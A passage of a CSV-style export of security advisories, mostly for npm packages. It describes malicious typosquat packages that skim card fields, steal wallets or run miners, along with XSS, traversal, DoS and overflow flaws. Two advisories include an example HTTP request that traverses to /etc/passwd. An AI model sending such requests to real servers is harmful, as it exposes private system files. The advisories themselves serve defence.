+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'yeoman-genrator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1198'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qmxf-fxq7-w59f,2021-09-24T14:46:00Z,2020-09-01T19:43:53Z,,[],Malicious Package in angular-material-sidenav-rnd,"Version 0.1.1 of `angular-material-sidenav-rnd` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+If version 0.1.1 of this module is found installed you will want to replace it with a version before or after 0.1.1. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'angular-material-sidenav-rnd'}, 'versions': ['0.1.1']}]","[{'type': 'WEB', 'url': 'https://github.com/musabgosset/angular-material-sidenav'}, {'type': 'PACKAGE', 'url': 'https://github.com/sovanna/angular-material-sidenav'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANGULARMATERIALSIDENAVRND-451015'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/615'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:29:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-44vf-8ffm-v2qh,2020-08-31T18:34:35Z,2020-09-02T15:42:47Z,,[],Sensitive Data Exposure in rails-session-decoder,"All versions of `rails-session-decoder` are missing verification of the Message Authentication Code appended to the cookies. This may lead to decryption of cipher text thus exposing encrypted information.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rails-session-decoder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/753'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m36m-x4c5-rjxj,2020-08-31T18:27:21Z,2020-09-01T19:01:58Z,,[],Silently Runs Cryptocoin Miner in hooka-tools,"Affected versions of `hooka-tools` were compromised and modified to silently run a cryptocoin miner in the background.
+
+All affected versions have been unpublished from the npm registry.
+
+
+## Recommendation
+
+While this module has been unpublished, some versions may exist in mirrors or caches. Do not install this module, and remove it if found.",[],"[{'package': {'ecosystem': 'npm', 'name': 'hooka-tools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/549'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:27:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p82g-2xpp-m5r3,2021-09-28T16:55:57Z,2020-09-11T21:18:05Z,,['CVE-2015-5654'],Cross-Site Scripting in dojo,"Versions of `dojo` prior to 1.2.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize HTML code in user-controlled input, allowing attackers to execute arbitrary JavaScript in the victim's browser.
+
+
+## Recommendation
+
+Upgrade to version 1.2.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dojo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.1'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.2.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-5654'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5654'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOJO-174933'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/973'}, {'type': 'WEB', 'url': 'http://jvn.jp/en/jp/JVN13456571/index.html'}, {'type': 'WEB', 'url': 'http://jvndb.jvn.jp/jvndb/JVNDB-2015-000153'}, {'type': 'WEB', 'url': 'http://www-01.ibm.com/support/docview.wss?uid=swg21975256'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/77026'}, {'type': 'WEB', 'url': 'http://www.securitytracker.com/id/1034848'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-25jw-gcfj-283j,2023-09-07T22:09:07Z,2020-09-01T18:27:04Z,,['CVE-2017-16186'],Directory Traversal in 360class.jansenhm,"Affected versions of `360class.jansenhm` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '360class.jansenhm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16186'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/360class.jansenhm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/448'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7hx8-2rxv-66xv,2020-08-31T19:00:54Z,2020-09-03T15:48:00Z,,[],Denial of Service in hapi,"All Versions of `hapi` are vulnerable to Denial of Service. The CORS request handler has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+This package is deprecated and is now maintained as `@hapi/hapi`. Please update your dependencies to use `@hapi/hapi`. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'hapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1481'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qh38-wrgf-cj2c,2023-09-11T20:34:37Z,2020-09-01T18:48:05Z,,['CVE-2017-16183'],Directory Traversal in iter-server,"Affected versions of `iter-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'iter-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16183'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/iter-server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/454'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r5xw-q988-826m,2021-09-23T21:51:49Z,2020-09-01T19:39:37Z,,[],Remote Memory Exposure in mongoose,"Versions of `mongoose` before 4.3.6, 3.8.39 are vulnerable to remote memory exposure.
+
+Trying to save a number to a field of type Buffer on the affected mongoose versions allocates a chunk of uninitialized memory and stores it in the database.
+
+
+## Recommendation
+
+Update to version 4.3.6, 3.8.39 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongoose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5.5'}, {'fixed': '3.8.39'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.38'}}, {'package': {'ecosystem': 'npm', 'name': 'mongoose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.3.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/Automattic/mongoose/issues/3764'}, {'type': 'WEB', 'url': 'https://gist.github.com/ChALkeR/440bc3dfcbd9b6da75c3'}, {'type': 'WEB', 'url': 'https://gist.github.com/ChALkeR/d4a8055625221b6e65f0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/599'}]","{'cwe_ids': ['CWE-201'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:29:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x3w4-mrmv-cw2x,2021-09-29T21:26:19Z,2020-09-03T22:19:44Z,,[],Malicious Package in buffev-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffev-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1258'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4xg9-g7qj-jhg4,2021-09-29T20:33:40Z,2020-09-03T20:46:36Z,,[],Malicious Package in comander,"All versions of `comander` contains malicious code . The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. Upon require the package attempts to start a cryptocurrency miner using coin-hive.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether your system is running the cryptocurrency miner.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'comander'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1193'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-86mr-6m89-vgj3,2021-10-04T21:10:07Z,2020-09-03T15:51:38Z,,[],Buffer Overflow in node-weakauras-parser,"Affected versions of `node-weakauras-parser` are vulnerable to a Buffer Overflow. The `encode_weakaura` function fails to properly validate the input size. A buffer of 13835058055282163711 bytes causes an overflow on 64-bit systems.
+
+
+## Recommendation
+
+Upgrade to versions 1.0.5, 2.0.2, 3.0.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-weakauras-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.4'}, {'fixed': '1.0.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'node-weakauras-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'node-weakauras-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Zireael-N/node-weakauras-parser/commit/bc146da09db689e554d28e948f1cf1c138f09f69#diff-023afe6291ac9ada88788108cb3367b3R38-R43'}, {'type': 'PACKAGE', 'url': 'https://github.com/Zireael-N/node-weakauras-parser'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1504'}]","{'cwe_ids': ['CWE-120'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pxqp-mv67-g528,2021-09-29T20:53:05Z,2020-09-03T21:38:34Z,,[],Malicious Package in bqffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bqffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1230'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-28xx-8j99-m32j,2021-10-01T13:11:55Z,2020-09-01T20:37:25Z,,[],Malicious Package in nginxbeautifier,"Version 1.0.14 of `nginxbeautifier` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.14 of this module is found installed you will want to replace it with a version before or after 1.0.14. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nginxbeautifier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.14'}, {'fixed': '1.0.15'}]}], 'versions': ['1.0.14']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/639'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-53jx-4wwh-gcqj,2023-07-27T00:09:48Z,2020-09-11T21:11:34Z,,[],Malicious Package in angular-location-update,"Version 0.0.3 of `angular-location-update` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.0.2",[],"[{'package': {'ecosystem': 'npm', 'name': 'angular-location-update'}, 'versions': ['0.0.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/930'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-36c4-4r89-6whg,2021-10-04T21:05:01Z,2020-09-03T15:49:02Z,,[],Prototype Pollution in @commercial/subtext,"Versions of `@commercial/subtext` prior to 5.1.2 are vulnerable to Prototype Pollution. A multipart payload can be constructed in a way that one of the parts’ content can be set as the entire payload object’s prototype. If this prototype contains data, it may bypass other validation rules which enforce access and privacy. If this prototype evaluates to null, it can cause unhandled exceptions when the request payload is accessed.
+
+
+## Recommendation
+
+Upgrade to version 5.1.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@commercial/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1484'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g9r4-xpmj-mj65,2020-08-31T18:55:14Z,2020-09-04T15:06:32Z,,[],Prototype Pollution in handlebars,"Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to prototype pollution. It is possible to add or modify properties to the Object prototype through a malicious template. This may allow attackers to crash the application or execute Arbitrary Code in specific conditions.
+
+
+## Recommendation
+
+Upgrade to version 3.0.8, 4.5.3 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1325'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v7cp-5326-54fh,2020-08-31T18:43:34Z,2020-09-03T16:45:15Z,,[],Path Traversal in bruteser,"Versions of `bruteser` prior to 0.1.0 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
+
+
+## Recommendation
+
+Upgrade to version 0.1.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bruteser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/342066'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/999'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qmgf-fp85-55gr,2021-10-01T20:39:27Z,2020-09-04T15:40:34Z,,[],Malicious Package in bitcionjs,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcionjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1360'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8pwx-j4r6-5v38,2021-10-01T21:02:37Z,2020-09-03T17:05:25Z,,[],Malicious Package in hdkye,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'hdkye'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1399'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jc87-6vpp-7ff3,2021-08-26T15:11:45Z,2020-09-25T18:28:22Z,,['CVE-2020-15198'],Heap buffer overflow in Tensorflow,"### Impact
+The `SparseCountSparseOutput` implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the `indices` tensor has the same shape as the `values` one. The values in these tensors are always accessed in parallel:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L193-L195
+
+Thus, a shape mismatch can result in accesses outside the bounds of heap allocated buffers.
+
+### Patches
+We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
+
+We recommend users to upgrade to TensorFlow 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jc87-6vpp-7ff3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15198'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-119', 'CWE-122'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T16:52:55Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-fvwr-h9xh-m6wc,2020-08-31T18:49:40Z,2020-09-03T20:33:17Z,,[],Denial of Service in @commercial/subtext,"Versions of `@commercial/subtext` prior to 5.1.1 are vulnerable to Denial of Service (DoS). The package fails to enforce the `maxBytes` configuration for payloads with chunked encoding that are written to the file system. This allows attackers to send requests with arbitrary payload sizes, which may exhaust system resources leading to Denial of Service.
+
+
+## Recommendation
+
+Upgrade to version 5.1.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': '@commercial/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hapijs/subtext/issues/72'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1166'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-87qw-7v97-w34r,2021-10-01T13:46:36Z,2020-09-02T18:33:18Z,,[],Malicious Package in asinc,"All versions of `asinc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asinc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/840'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:37:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8mm3-2mcj-cx6r,2021-09-30T21:57:57Z,2020-09-11T21:09:24Z,,[],Malicious Package in angluar-cli,"Version 0.0.3 of `angluar-cli` contains malicious code as a postinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed the package attempts to remove files and stop processes related to McAfee antivirus on macOS.
+
+
+## Recommendation
+
+Remove the package from your environment and verify whether files were deleted and if processes were stopped.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'angluar-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/918'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pmgv-94f5-6w7w,2021-10-01T14:03:02Z,2020-09-02T20:21:30Z,,[],Malicious Package in eact,"All versions of `eact` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'eact'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/853'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6x4w-8w53-xrvv,2020-09-14T18:42:48Z,2020-09-14T18:44:01Z,,['CVE-2015-0254'],XXE in Apache Standard Taglibs,Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) or (2) JSTL XML tag.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.taglibs:taglibs-standard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.taglibs:taglibs-standard-impl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-0254'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2016:1376'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/8a20e48acb2a40be5130df91cf9d39d8ad93181989413d4abcaa4914@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6c93d8ade3788dbc00f5a37238bc278e7d859f2446b885460783a16f@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc1686f6196bb9063bf26577a21b8033c19c1a30e5a9159869c8f3d38@%3Cpluto-dev.portals.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1179e6971bc46f0f68879a9a10cc97ad4424451b0889aeef04c8077@%3Cpluto-scm.portals.apache.org%3E'}, {'type': 'WEB', 'url': 